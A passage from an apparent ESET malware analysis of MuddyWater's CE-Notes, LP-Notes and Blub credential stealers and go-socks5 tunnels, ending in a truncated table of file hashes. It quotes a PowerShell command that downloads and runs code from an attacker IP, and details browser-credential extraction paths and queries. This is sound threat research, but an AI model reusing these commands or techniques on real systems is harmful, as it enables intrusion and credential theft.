This value can be configured by command ID <span>700<\/span>.<\/li>\n<li>Upon failure, connection attempts are retried up to 10 times.<\/li>\n<li>Prior to encryption, the data is always formatted as <span>&lt;computer_name&gt;\/&lt;username&gt;*&lt;data&gt;<\/span>.<\/li>\n<\/ul>\n<p>In the server \u2192 backdoor direction of the communications:<\/p>\n<ul>\n<li>The HTTP status code determines the backdoor command ID.<\/li>\n<li>The backdoor command arguments are included in the HTTP response body.<\/li>\n<\/ul>\n<h3>CE-Notes browser-data stealer<\/h3>\n<p>CE-Notes is a browser-data stealer that we named after the filename \u2013 <span>ce-notes.txt<\/span> \u2013 used to stage stolen data on disk. We discovered CE-Notes in 2024 when we observed MuddyWater deploying EXE and DLL versions of it on the system of an organization in Israel.<\/p>\n<p>CE-Notes was downloaded with the following PowerShell command:<\/p>\n<p><span>&#8220;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http:\/\/206.71.149[.]51:443\/57576?filter_relational_operator_2=60169).content | Invoke-Expression<\/span><\/p>\n<p>Both versions of the browser-data stealer attempt to steal and decrypt the app-bound encryption key stored in the Local State file (<span>%APPDATA%\\Local\\Google\\Chrome\\User Data\\Local State<\/span>) of Chromium browsers (Chrome, Brave, and Edge). <a href=\"https:\/\/security.googleblog.com\/2024\/07\/improving-security-of-chrome-cookies-on.html\">App-bound encryption<\/a> was introduced in Chrome version 127, enabling Chrome to encrypt data tied to app identity. <a href=\"https:\/\/redcanary.com\/blog\/threat-intelligence\/google-chrome-app-bound-encryption\/\">Cybercriminals<\/a> and APT groups have caught on and are actively trying to work around app-bound encryption to steal session keys. 
CE-Notes is quite similar to <a href=\"https:\/\/github.com\/xaitax\/Chrome-App-Bound-Encryption-Decryption\">ChromElevator<\/a> on GitHub.<\/p>\n<p>The collected data is AES-CBC encrypted using the CNG API with the key <span>9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F<\/span> and the IV <span>4103A09887B82FFD56A93BB431805224<\/span>.<\/p>\n<p>Then the encrypted data is stored on disk in <span>C:\\Users\\Public\\Downloads\\ce-notes.txt<\/span> for later retrieval (probably via an RMM tool, since neither the EXE nor the DLL version has any means of exfiltrating the file). The primary difference between the EXE and the DLL is the virtual machine evasion functionality added to the DLL.<\/p>\n<p>We observed the CE-Notes browser-data stealer in the following locations:<\/p>\n<ul>\n<li><span>C:\\system2.dll<\/span><\/li>\n<li><span>C:\\Users\\Public\\Downloads\\system2.dll<\/span><\/li>\n<li><span>C:\\Intel\\system.dll<\/span><\/li>\n<li><span>C:\\20240926_165509.exe<\/span><\/li>\n<\/ul>\n<h3>LP-Notes credential stealer<a><\/a><\/h3>\n<p>LP-Notes is a C\/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. Following the same naming convention as in the case of CE-Notes, we named the stealer LP-Notes based on the local file it uses to stage stolen credentials before exfiltration: <span>C:\\Users\\Public\\Downloads\\lp-notes.txt<\/span> (vs. <span>C:\\Users\\Public\\Downloads\\ce-notes.txt<\/span>). The sole purpose of LP-Notes is to entice victims into submitting their credentials by displaying a fake Windows Security dialog, prompting them to enter their Windows username and password. 
We have observed an instance of LP-Notes being downloaded and executed by PowerShell with a very similar command line to that shown in the CE-Notes section.<\/p>\n<h4>Initialization<\/h4>\n<p>On execution, LP-Notes starts by searching for a process named <span>taskhostw.exe<\/span> (Host Process for Windows Tasks) and then impersonating the security context of the process (via the <span>ImpersonateLoggedOnUser<\/span> API); only then does LP-Notes activate its malicious payload.<\/p>\n<p>LP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption. Figure 5 shows the function that decrypts strings of lengths ranging from 15 to 19 characters, though the decryption key is always the same \u2013 a set of predefined constants that are added or subtracted from each byte of the string. Interestingly, CE-Notes uses the same decryption routine, except for a different decryption key, as shown in Figure 6.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 5. LP-Notes string decryption routine\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-5.png\" title=\"Figure 5. LP-Notes string decryption routine\" width=\"\"><figcaption><em>Figure 5. LP-Notes string decryption routine<\/em><\/figcaption><\/figure>\n<figure><img decoding=\"async\" alt=\"Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-6.png\" title=\"Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes\" width=\"\"><figcaption><em>Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes<\/em><\/figcaption><\/figure>\n<p>LP-Notes uses string stacking for strings shorter than 15 or longer than 19 characters, including the decryption key, IV, and import names. 
Finally, to obscure the use of Windows API functions and to make static analysis more challenging, LP-Notes dynamically resolves the API functions during the C runtime startup, before the execution of the <span>WinMain<\/span> function, the standard entry point for a graphical Windows-based application per <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/winbase\/nf-winbase-winmain\">Microsoft<\/a>, thus hiding direct references to the API functions from pseudocode view (see Figure 7).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 7. LP-Notes WinMain function with obfuscated import names vs deobfuscated view\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-7.png\" title=\"Figure 7. LP-Notes WinMain function with obfuscated import names (left) vs. deobfuscated view (right)\" width=\"\"><figcaption><em>Figure 7. LP-Notes <\/em><span>WinMain<\/span><em> function with obfuscated import names (left) vs. deobfuscated view (right)<\/em><\/figcaption><\/figure>\n<h4>Capabilities<\/h4>\n<p>In an endless loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows username and password, as shown in Figure 8 (via the <span>CredUIPromptForWindowsCredentialsW<\/span> API). Note that although similar, this is not the same as the fake credential prompt used by MuddyViper (see Figure 4). It immediately confirms the validity of any submitted credentials by attempting to log on as that user (via the <span>CredUnPackAuthenticationBufferW<\/span> and <span>LogonUserW<\/span> APIs).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 8. A fake Windows Security dialog displayed by LP-Notes\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-8.png\" title=\"Figure 8. A fake Windows Security dialog displayed by LP-Notes\" width=\"\"><figcaption><em>Figure 8. 
A fake Windows Security dialog displayed by LP-Notes<\/em><\/figcaption><\/figure>\n<p>If successful, the harvested credentials are then AES-CBC encrypted using the CNG API with the key <span>ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC<\/span> and the IV <span>91A4E6F6D51DAEE773A8F00279792578<\/span>.<\/p>\n<p>Similar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file \u2013 in this case <span>C:\\Users\\Public\\Downloads\\lp-notes.txt<\/span>. As neither of these components has the capability to exfiltrate data, another component presumably handles this (either an RMM tool or MuddyViper).<\/p>\n<h3>Blub browser-data stealer<\/h3>\n<p>Blub is a C\/C++ browser-data stealer incorporating a statically linked SQLite library. The name is derived from its filename, <span>Blub.exe<\/span>. We observed the PDB path <span>C:\\Users\\jojo\\source\\repos\\stealer\\x64\\Release\\stealer.pdb<\/span>. It steals user login data from Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera web browsers.<\/p>\n<h4>Chromium-based browsers<\/h4>\n<p>For Chrome, Blub first terminates chrome.exe (if running) and then parses and decrypts the encryption key from <span>C:\\Users\\&lt;username&gt;\\AppData\\Local\\Google\\Chrome\\User Data\\Local State<\/span>. This key is used to encrypt sensitive data stored by Chrome, such as passwords or cookies, and it is protected by the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Data_Protection_API\">Data Protection API (DPAPI)<\/a> so that it can only be decrypted on the system where it was originally encrypted. Blub decrypts this key via the <span>CryptUnprotectData<\/span> API, and then uses it to decrypt user credentials obtained from all existing Chrome user profiles on the compromised computer. 
The credentials, stored in <span>C:\\Users\\&lt;username&gt;\\AppData\\Local\\Google\\Chrome\\User Data\\&lt;profile_name&gt;\\Login Data<\/span>, are obtained via the following SQL query:<\/p>\n<p><span>SELECT origin_url, username_value, password_value FROM logins<\/span><\/p>\n<p>A similar series of steps is used to obtain and decrypt user credentials from Microsoft Edge and Opera user profiles, using the key obtained from <span>C:\\Users\\&lt;username&gt;\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State<\/span> and <span>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local State<\/span>, respectively.<\/p>\n<h4>Firefox<\/h4>\n<p>Finally, to decrypt stored user credentials for Mozilla Firefox, Blub parses the <span>hostname<\/span>, <span>encryptedUsername<\/span>, and <span>encryptedPassword<\/span> values from the <span>logins.json<\/span> file in each user\u2019s profile directory, i.e., <span>%APPDATAROAMING%\\Mozilla\\Firefox\\Profiles\\&lt;profile_name&gt;<\/span>. The credentials are then decrypted using the <span>PK11SDR_Decrypt<\/span> function from the <span>nss3.dll<\/span> library used by Firefox.<\/p>\n<p>The collected data is stored in a local file named <span>file.txt<\/span>, with no encryption. The same data is logged to the console, with no encryption, along with verbose status messages. Blub has no capability to exfiltrate this file.<\/p>\n<p>Note that Blub checks for running processes associated with security solutions before executing its malicious payload, focusing on the combination of <span>afwServ.exe<\/span> (Avast firewall) and <span>AvastSvc.exe<\/span> (Avast antivirus) processes. If <span>afwServ.exe<\/span> is detected running (but not <span>AvastSvc.exe<\/span>), Blub concludes that Norton is running (which now uses the <a href=\"https:\/\/community.norton.com\/t\/norton-with-avast-engine\/370204\/3\">Avast engine<\/a>) on the compromised host, and exits. 
If <span>AvastSvc.exe<\/span> (Avast) is detected, Blub continues with the execution, except it skips stealing credentials from Microsoft Edge.<\/p>\n<p>While Blub\u2019s strings are stored in cleartext, a simple obfuscation technique is used for strings associated with the Google Chrome data stealer functionality. Specifically, multiple strings are concatenated into one long string, with 16 random characters between them, apparently to hide them from view during static analysis:<\/p>\n<p><span>gdGlog}o{eRwjpw&amp;&#8221;encrypted_key&#8221;:FAe[{hy|b-vcJvxGImpersonateLoggeh}gdOvlgt_NxuoolOpenProcessTokenVLUKKW&#8217;xxqjpwe}uDuplicateTokenExs5&amp;}vl{tiplh|io|eIpuvvkdXznx(Gh}n2(sh|y\u2302ryme~ds~<\/span><\/p>\n<p>Removing the junk characters and splitting the strings returns:<\/p>\n<ul>\n<li><span>&#8220;encrypted_key&#8221;:<\/span><\/li>\n<li><span>ImpersonateLogge<\/span><\/li>\n<li><span>OpenProcessToken<\/span><\/li>\n<li><span>DuplicateTokenEx<\/span><\/li>\n<\/ul>\n<h3>go\u2011socks5 reverse tunnels<\/h3>\n<p>MuddyWater\u2019s go\u2011socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go\u2011socks5, yamux, and resocks; they have been frequently used in MuddyWater\u2019s recent campaigns.<\/p>\n<p>Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.<\/p>\n<pre><code>path ESETGO\nmod ESETGO (devel)\ndep github.com\/armon\/go-socks5 v0.0.0-20160902184237-e75332964ef5 h1:0CwZNZbxp69SHPdPJAN\/hZIm0C4OItdklCFmMRWYpio=\ndep github.com\/hashicorp\/yamux v0.1.1 h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=\ndep golang.org\/x\/net v0.29.0 h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=\ndep golang.org\/x\/sys v0.25.0 h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=\nbuild -buildmode=exe\nbuild -compiler=gc\nbuild -ldflags=\"-w -s\"\nbuild CGO_ENABLED=1\nbuild CGO_CFLAGS=\nbuild CGO_CPPFLAGS=\nbuild 
CGO_CXXFLAGS=\nbuild CGO_LDFLAGS=\nbuild GOARCH=amd64\nbuild GOOS=windows\nbuild GOAMD64=v1<\/code><\/pre>\n<p><em>Figure 9. Build configuration strings from MuddyWater\u2019s go\u2011socks5 variants<\/em><\/p>\n<p>The primary purpose of MuddyWater\u2019s go\u2011socks5 proxy is to relay communication between the compromised machine (on a specific port) and a hardcoded C&amp;C server, using a hardcoded connection key to authenticate with the C&amp;C server via SSL\/TLS. This setup allows the attacker to route C&amp;C traffic (potentially related to other compromises) through the compromised machine and thus to hide the location of the real C&amp;C server.<\/p>\n<h2>Conclusion<\/h2>\n<p>This campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously undocumented components \u2013 such as the Fooder loader and MuddyViper backdoor \u2013 signals an effort to enhance stealth, persistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a diversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group\u2019s operational immaturity remain.<\/p>\n<p>MuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being timely, effective, and increasingly challenging to defend against. 
While we assess that MuddyWater will remain a leading actor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.<\/p>\n<p>ESET will continue to monitor the group\u2019s activities, focusing on further signs of technical advancement and strategic targeting of government, military, telecommunications, and critical infrastructure.<\/p>\n<blockquote>\n<div><em>For any inquiries about our research published on WeLiveSecurity, please contact us at <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>. <\/em><\/div>\n<div><em>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=muddywater-snakes-riverbank&amp;sfdccampaignid=7011n0000017htTAAQ\">ESET Threat Intelligence<\/a> page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<h3>Files<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"132\"><strong>Filename<\/strong><\/td>\n<td width=\"170\"><strong>Detection<\/strong><\/td>\n<td width=\"161\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>76632910CF67697BF5D7<wbr><\/wbr>285FAE38BFCF438EC082<\/span><\/td>\n<td width=\"132\"><span>OsUpdater<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.E<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder launcher.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>1723D5EA7185D2E339FA<wbr><\/wbr>9529D245DAA5D5C9A932<\/span><\/td>\n<td width=\"132\"><span>Blub<wbr><\/wbr>.exe<\/span><\/td>\n<td 
width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>69B097D8A3205605506E<wbr><\/wbr>6C1CC3C13B71091CB519<\/span><\/td>\n<td width=\"132\"><span>Blub<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B7A8F09CB5FF8A336539<wbr><\/wbr>88FFBA585118ACF24C13<\/span><\/td>\n<td width=\"132\"><span>Blub<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B8997526E4781A6A1479<wbr><\/wbr>690E30072F38E091899D<\/span><\/td>\n<td width=\"132\"><span>stealer<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.H<\/td>\n<td width=\"161\">MuddyWater \u2013 Blub browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>8E21DE54638A79D8489C<wbr><\/wbr>59D958B23FE22E90944A<\/span><\/td>\n<td width=\"132\"><span>7d1e9726b5YZPYc<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">Win32\/MuddyWater.B<\/td>\n<td width=\"161\">MuddyWater \u2013 CE-Notes browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>CD47420F5CE408D95C98<wbr><\/wbr>306D78B977CDA0400C8F<\/span><\/td>\n<td width=\"132\"><span>fe197add74IVcQn<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.I<\/td>\n<td width=\"161\">MuddyWater \u2013 CE-Notes browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>C1299E8C9A8567A9C292<wbr><\/wbr>157F3ED65B818AA78900<\/span><\/td>\n<td width=\"132\"><span>vmsvc<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.I<\/td>\n<td width=\"161\">MuddyWater \u2013 CE-Notes browser-data stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>29CDA06701F9A9C0A679<wbr><\/wbr>1775C3EB70F5B52BBEFF<\/span><\/td>\n<td 
width=\"132\"><span>3a70e4c8c2IVcQn<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.C<\/td>\n<td width=\"161\">MuddyWater \u2013 LP-Notes credential stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>8F3ED626E7B929450E36<wbr><\/wbr>E97BA5539C8371DF0EF8<\/span><\/td>\n<td width=\"132\"><span>3a70e4c8c2IVcQn<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.C<\/td>\n<td width=\"161\">MuddyWater \u2013 LP-Notes credential stealer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>007B5CD6D6ACF972F774<wbr><\/wbr>3F79E23CAB9BB2ECBEE3<\/span><\/td>\n<td width=\"132\"><span>Dsync-es<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.F<\/td>\n<td width=\"161\">MuddyWater \u2013 Mimikatz loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>CD36F93DBC4C71893059<wbr><\/wbr>3D8F029EFDCAA52B619B<\/span><\/td>\n<td width=\"132\"><span>App_chek<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded HackBrowserData tool.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>47B70C47BEB33E88B419<wbr><\/wbr>7D6AF1B768230E51B067<\/span><\/td>\n<td width=\"132\"><span>steam<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D46900D78AE036967E0B<wbr><\/wbr>37F9EC6A8000131AE604<\/span><\/td>\n<td width=\"132\"><span>antimage<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win32\/MuddyWater.A<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>0657D0B0610618886DDD<wbr><\/wbr>74C3D0A1D582CDD24863<\/span><\/td>\n<td width=\"132\"><span>wtsapi32.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper 
backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>2939FD218E0145D730BD<wbr><\/wbr>94AA1C76386A5259EACE<\/span><\/td>\n<td width=\"132\"><span>msi.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3BC6502A55A4D5D29132<wbr><\/wbr>DA4D9943E154A810CC83<\/span><\/td>\n<td width=\"132\"><span>WinWin<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>7950296331802188EB99<wbr><\/wbr>E232E2C383CB9FDD5D7D<\/span><\/td>\n<td width=\"132\"><span>20241118_223247<wbr><\/wbr>_Launcher<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>8580824FE14DB1583881<wbr><\/wbr>02B16C1C79DFBBA36083<\/span><\/td>\n<td width=\"132\"><span>Launcher.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>B48B93B4EB69D01588D3<wbr><\/wbr>71356EDE614C5E7378DE<\/span><\/td>\n<td width=\"132\"><span>Launcher<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>EA8A1C2382FF765709D7<wbr><\/wbr>F78EF60482598E4C0DEB<\/span><\/td>\n<td width=\"132\"><span>vcruntime140_1<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>EAF4BAFC62170C9FCA1F<wbr><\/wbr>6B591848883DBF97F93D<\/span><\/td>\n<td 
width=\"132\"><span>Launcher<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>F5EFBA6CCBA5A6AD6C3A<wbr><\/wbr>FA928C0E5EAA44597411<\/span><\/td>\n<td width=\"132\"><span>ncrypt.dll<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>13DA612D75DC5268F523<wbr><\/wbr>5F5BACE6D8F0DB0091FF<\/span><\/td>\n<td width=\"132\"><span>WinWin(persist)<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">Win64\/MuddyWater.G<\/td>\n<td width=\"161\">MuddyWater \u2013 Fooder loader with embedded MuddyViper backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>25361183DE63F296BA71<wbr><\/wbr>B6FCF0725E022B3C989A<\/span><\/td>\n<td width=\"132\"><span>0bff183a39ruQsY<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>0E9A4892CFA1C9065B36<wbr><\/wbr>D8F2E164E28609A8CF5D<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>2B09241CA025BDC4455E<wbr><\/wbr>9F6BA6009E2F27C08EDF<\/span><\/td>\n<td width=\"132\"><span>dttcodexgigas<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>2E9BE23CDD8152DB6CD1<wbr><\/wbr>A54E001C4EA82FF6F1C6<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fHxjyf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td 
width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>45FA7DE711FEA1F8D1E3<wbr><\/wbr>48E87834246C455DD2ED<\/span><\/td>\n<td width=\"132\"><span>fa54125dc8ZpaNJ<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>4E0EF2386980639FC535<wbr><\/wbr>5FD68DAFF54EB2AD622E<\/span><\/td>\n<td width=\"132\"><span>20d188afdcWgOQB<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>4E9529BA4A6E42D6278D<wbr><\/wbr>37E3FDEE9E1D991CEBE0<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bHOVby<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>50C6D4A2AD16A231CF11<wbr><\/wbr>C43F3BBC868D90E20D25<\/span><\/td>\n<td width=\"132\"><span>re<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.F<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>52009F36058337B6401D<wbr><\/wbr>A0A0F4885A0C185F0520<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bHOVby<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>535882B6EDAB29247E03<wbr><\/wbr>5236A84CA510FB1E0854<\/span><\/td>\n<td width=\"132\"><span>20d188afdcpfLFq<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td 
width=\"179\"><span>544CE18E4C1F1B288DEE<wbr><\/wbr>6018DFCF4E4D4A315F7A<\/span><\/td>\n<td width=\"132\"><span>1110254b63WfTEa<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>54EBC125039CC83E4682<wbr><\/wbr>CA44DD592534562B25C3<\/span><\/td>\n<td width=\"132\"><span>FMAPP.dll<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5A08150C1DC17E9F6912<wbr><\/wbr>96F0A577C2EC9BA8028C<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bJeJOf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 proxy reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5D1E61DA8083C41FF1FC<wbr><\/wbr>23A1222A4A88B43A4E9B<\/span><\/td>\n<td width=\"132\"><span>bd34a33f5bJeJOf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater \u2013 go\u2011socks5 reverse tunnel.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>6532E0437C8913FA418F<wbr><\/wbr>1EE258561B15BBEE9052<\/span><\/td>\n<td width=\"132\"><span>7295be2b1fHxjyf<wbr><\/wbr>.exe<\/span><\/td>\n<td width=\"170\">WinGo\/TrojanProxy<wbr><\/wbr>.Agent.D<\/td>\n<td width=\"161\">MuddyWater 